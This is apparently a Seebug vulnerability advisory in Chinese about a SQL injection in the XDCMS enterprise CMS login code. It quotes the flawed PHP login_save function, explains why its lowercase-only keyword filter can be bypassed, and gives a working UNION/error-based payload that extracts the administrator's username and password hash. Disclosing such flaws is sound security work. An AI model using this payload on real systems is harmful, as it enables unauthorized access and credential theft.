XDCMS企业管理系统SQL注入#2

2013-12-02T00:00:00
ID SSV:94956
Type seebug
Reporter Root
Modified 2013-12-02T00:00:00

Description

简要描述:

最新版XDCMS企业管理系统,由于过滤不严,可绕过限制,导致SQL注入

详细说明:

注入在XDCMS企业管理系统的登录功能处,来看看\system\modules\member\index.php文件: 登录时会调用login_save进行登录验证,问题就出在index.php的login_save函数处:

``` public function login_save(){ $username = safe_html($_POST['username']);//获取UserName,通过safe_html进行过滤,这里存在缺陷,可绕过限制,进行注入 $password = safe_html($_POST['password']);

    if(empty($username)||empty($password)){
        showmsg(C('user_pass_empty'),'-1');
    }

    $sql="select * from ".DB_PRE."member where `username`='$username'";//通过绕过限制,在这里进行注入
    if($this->mysql->num_rows($sql)==0){
        showmsg(C('member_not_exist'),'-1');
    }

    $password=md5(md5($password));
    $rs=$this->mysql->get_one($sql);
    if($password!=$rs['password']){
        showmsg(C('password_error'),'-1');
    }

    if($rs['is_lock']==1){
        showmsg(C('user_lock'),'-1');
    }

    $logins=$rs["logins"]+1;
    $ip=safe_replace(safe_html(getip()));
    $this->mysql->db_update("member","`last_ip`='".$ip."',`last_time`=".datetime().",`logins`=".$logins,"`username`='$username'");

    Cookie::_setcookie(array('name'=>'member_user','value'=>$username));
    Cookie::_setcookie(array('name'=>'member_userid','value'=>$rs['userid']));
    Cookie::_setcookie(array('name'=>'member_groupid','value'=>$rs['groupid']));
    unset($rs);
    showmsg(C("login_success"),"index.php?m=member");
}

```

漏洞证明:

由于在获取UserName时,通过safe_html进行过滤,safe_html只是按照小写过滤了常规的SQL注入敏感词以及=和,但只这里存在缺陷,可绕过限制,进行注入。 我们使用小写SQL语句,并且不实用=和 在登录是,抓包,在UserName的值后面增加一下内容:

' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM (SELECT count(1),concat(round(rand(0)),(SELECT concat(username,0x23,password) FROM c_admin LIMIT 0,1))a FROM information_schema.tables GROUP by a)b#

即可注入出管理员的用户名密码

<img src="https://images.seebug.org/upload/201311/30203655fffe86ba1742808a51deb67a6a0ac06b.png" alt="dl1.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201311/302037083fd57d1094784b045edc02e7951edc89.png" alt="dl2.png" width="600" onerror="javascript:errimg(this);">